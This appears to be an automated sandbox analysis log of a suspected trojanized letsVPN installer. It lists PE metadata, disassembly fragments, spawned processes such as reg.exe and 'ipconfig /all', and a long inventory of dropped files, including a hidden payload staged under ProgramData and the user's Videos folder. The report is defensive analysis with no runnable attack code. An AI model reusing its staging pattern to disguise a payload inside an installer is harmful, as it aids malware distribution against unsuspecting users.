              Source: s.0.dr Static PE information: real checksum: 0x26890d should be: 0x1370ba
              Source: e_sqlite3.dll0.21.dr Static PE information: section name: _RDATA
              Source: WebView2Loader.dll.21.dr Static PE information: section name: .00cfg
              Source: WebView2Loader.dll.21.dr Static PE information: section name: _RDATA
              Source: WebView2Loader.dll0.21.dr Static PE information: section name: .00cfg
              Source: WebView2Loader.dll0.21.dr Static PE information: section name: .voltbl
              Source: ndp462-web.exe.21.dr Static PE information: section name: .boxld01
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe Code function: 19_2_00537D65 push ecx; ret 19_2_00537D78
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe Code function: 19_2_6D08EDC3 push ecx; ret 19_2_6D08EDD6
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe Code function: 19_2_6D0949D7 push ecx; ret 19_2_6D0949EA
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe Code function: 19_2_6D0B7BA8 pushad ; iretd 19_2_6D0B7BB6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 27_2_00DBE5E1 pushad ; retf 0007h 27_2_00DBE5E2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 27_2_00DB97D1 push ss; retf 0007h 27_2_00DB97D2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 27_2_00DBE7D0 pushad ; retf 0007h 27_2_00DBE7D2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 27_2_00DB97F8 push ss; retf 0007h 27_2_00DB97FA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 27_2_00DB8788 push cs; retf 0007h 27_2_00DB878A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 27_2_00DB9781 push ss; retf 0007h 27_2_00DB9782
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 27_2_00DBE781 pushad ; retf 0007h 27_2_00DBE782
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 27_2_00DB98C8 push ss; retf 0007h 27_2_00DB98CA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 27_2_00DB9849 push ss; retf 0007h 27_2_00DB984A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 27_2_00DB9871 push ss; retf 0007h 27_2_00DB9872
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 27_2_00DB6820 push eax; ret 27_2_00DB6833
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 27_2_00DB9820 push ss; retf 0007h 27_2_00DB9822
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 27_2_00DB99E7 push ss; retf 0007h 27_2_00DB99EA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 27_2_00DB9987 push ss; retf 0007h 27_2_00DB998A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 27_2_00DB9A50 push ss; retf 0007h 27_2_00DB9A52
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 27_2_00DBDBE9 push ebx; retf 0007h 27_2_00DBDBEA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 27_2_00DBDC58 push ebp; retf 0007h 27_2_00DBDC5A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 27_2_00DBDC41 push ebx; retf 0007h 27_2_00DBDC42
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 27_2_00DBAC61 push ds; retf 0007h 27_2_00DBAC62
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 27_2_00DBDED7 push esi; retf 0007h 27_2_00DBDEDA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 27_2_00DBDE50 push esi; retf 0007h 27_2_00DBDE52
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exe Code function: 58_2_00688835 push ecx; ret 58_2_00688848
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exe Code function: 58_2_00688C76 push ecx; ret 58_2_00688C89
              Source: msvcr120.dll.0.dr Static PE information: section name: .text entropy: 6.95576372950548
              Source: msvcr120.dll.19.dr Static PE information: section name: .text entropy: 6.95576372950548
              Source: e_sqlite3.dll.21.dr Static PE information: section name: .text entropy: 7.128615396301837

              Persistence and Installation Behavior

              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\driver\tap0901.sys
              Source: C:\Windows\System32\cmd.exe Process created: reg.exe
              Source: C:\Windows\System32\cmd.exe Process created: reg.exe
              Source: C:\Windows\System32\cmd.exe Process created: reg.exe
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.EventLog.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.Core.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Resources.Reader.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Csp.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.StackTrace.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Primitives.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\ru\System.Web.Services.Description.resources.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\runtimes\win-arm\native\e_sqlite3.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\SuperSocket.Clientuser.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Windows.Interactivity.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsGoogleAnalytics.exe
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Memory.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.TextWriterTraceListener.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Permissions.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Drawing.Common.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.DriveInfo.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Registry.AccessControl.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\LetsPRO.exe
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.RegularExpressions.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\Hardcodet.Wpf.TaskbarNotification.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.InteropServices.RuntimeInformation.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.AccessControl.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.IPNetwork.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.dll
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Xml.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.ProtectedData.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Console.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Primitives.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Ports.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\WpfAnimatedGif.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Globalization.Extensions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.Expressions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Extensions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.ReaderWriter.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Duplex.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Web.Services.Description.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.InteropServices.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\log4net.dllJump to dropped file
              Source: C:\Windows\System32\cmd.exeFile created: C:\ProgramData\Jm42a\Q4nO1~16\base.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Tracing.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.SqlClient.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.Common.dllJump to dropped file
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeFile created: C:\Users\user\Videos\D73040F4~16\msvcr120.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ValueTuple.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Crashes.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceProcess.ServiceController.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\x64\WebView2Loader.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Buffers.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Registry.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.dllJump to dropped file
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeFile created: C:\Users\user\AppData\Local\Temp\{7c77b43b-9dea-844d-b268-70c5b13694a4}\tap0901.sys (copy)Jump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XPath.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.PatchApi.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\zh-TW\LetsPRO.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Tasks.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XPath.XDocument.dllJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\ProgramData\Jm42a\Q4nO1~16\sJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\ICSharpCode.AvalonEdit.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.AccessControl.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Timer.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Analytics.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\ToastNotifications.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Expression.Interactions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.Specialized.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\it\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.AppContext.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.NonGeneric.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Encoding.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\zh-SG\LetsPRO.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\SVGImage.dllJump to dropped file
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeFile created: C:\Users\user\Videos\D73040F4~16\Iozvmlb.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.SecureString.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.PerformanceCounter.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.Wpf.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.X509Certificates.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Pdb.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Handles.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Xml.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Globalization.Calendars.dllJump to dropped file
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeFile created: C:\Users\user\AppData\Local\Temp\{7c77b43b-9dea-844d-b268-70c5b13694a4}\SETB4F7.tmpJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Security.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\zh-CN\LetsPRO.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.MsDelta.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.WebHeaderCollection.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\pl\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLite-net.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\CommunityToolkit.Mvvm.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XmlDocument.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Numerics.Vectors.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Contracts.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\de\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\drivers\tap0901.sys (copy)Jump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Pipes.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\runtimes\win-x86\native\e_sqlite3.dllJump to dropped file
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeFile created: C:\Users\user\Videos\D73040F4~16\msvcp120.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLiteNetExtensionsAsync.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\zh-HK\LetsPRO.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\PusherClient.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.NameResolution.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\fr\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\ProgramData\Jm42a\Q4nO1~16\msvcp120.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\arm64\WebView2Loader.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Tasks.Extensions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Requests.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\WebSocket4Net.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Tasks.Parallel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.CodeDom.dllJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\ProgramData\letsvpn-latest.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\es\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.IsolatedStorage.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Rocks.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.nativelibrary.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Resources.ResourceManager.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\ru\LetsPRO.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.EventBasedAsync.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Debug.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Http.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\ndp462-web.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.batteries_v2.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.SystemEvents.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.TraceSource.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Drawing.Primitives.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNDomainModel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\NuGet.Squirrel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\zh-MO\LetsPRO.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.WebSockets.Client.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Users\user\AppData\Local\Temp\nse1A1D.tmp\System.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Principal.Windows.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.ThreadPool.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\FontAwesome.WPF.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Claims.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Squirrel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.Annotations.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Overlapped.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.NetTcp.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Toolkit.Uwp.Notifications.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.NetworkInformation.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.Watcher.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.core.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.OleDb.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLiteNetExtensions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Principal.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\Update.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.CompilerServices.VisualC.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\x86\WebView2Loader.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\pt-BR\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Compression.ZipFile.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.MemoryMappedFiles.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.Queryable.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\cs\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Json.dllJump to dropped file
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{a1287589-5177-bd45-adb1-516ad4522f2f}\tap0901.sys (copy)Jump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.provider.dynamic_cdecl.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Bcl.AsyncInterfaces.dllJump to dropped file
